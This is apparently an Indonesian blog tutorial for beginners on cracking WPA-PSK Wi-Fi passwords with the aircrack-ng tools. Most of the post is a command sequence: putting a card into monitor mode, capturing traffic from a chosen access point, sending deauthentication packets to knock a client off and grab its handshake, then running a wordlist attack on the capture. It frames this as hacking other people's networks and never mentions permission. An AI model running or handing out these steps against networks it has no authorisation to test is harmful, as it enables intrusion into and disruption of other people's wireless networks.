Sebenarnya Tutorial ini sudah sangat basi bagi kaum backtrackers,
tapi ini khusus ditujukan kepada newbie yang ingin tahu tentang cara
menghacking jaringan infrastructure dengan encryp WPA-PSK..agar tidak
ada pertanyaan yang di ulang2 seperti yang terjadi di area pertanyaan
pemul. Semoga tutorial ini dapat membantu.
- buka konsole dan ketikkan perintah :
# ifconfig -a
- Aktifkan interface wlan0
# ifconfig wlan0 up
- Membuat virtual interface untuk mode monitoring. Biasanya akan dibuat interface virtual mon0.
# airmon-ng start wlan0 [/color]
- Monitoring jaringan
# airodump-ng mon0
[color=blue]mon0 adalah interface virtual hasil dari airmon-ng tadi
hasil dari airodump-ng mon0
- Monitor jaringan khusus untuk bssid 00:90:4C:91:00:01 pada channel 11 dan hasil dari monitoring di tulis pada file yang bernama ‘test’
# airodump-ng -w test –channel 11 –bssid 00904c910001 mon0
- Menggunakan aireplay-ng untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking
# aireplay-ng -0 1 -a 00904c910001 -c oo1cbfa13fe3 mon0
-0 : mode serangan deAuthentication 1 : dilakukan sebanyak 1x deAuth [/list]
- setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah
# aircrack-ng test-01.cap -w /pentest/passwords/wordlists/inawpa.txt
inawpa.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/inawpa.txt[/color]
sebagai informasi, keberhasilan proses cracking tergantung ada
tidaknya password yang ada di list password dengan password yang
sebenarnya…jika password yang digunakan pada jaringan tersebut ada di
list password maka proses cracking akan berhasil dan jika password list
yang qt miliki tidak mencatat password yang digunakan pada jaringan
tersebut kemungkinan keberhasilan proses cracking akan gagal.
Tidak ada komentar:
Posting Komentar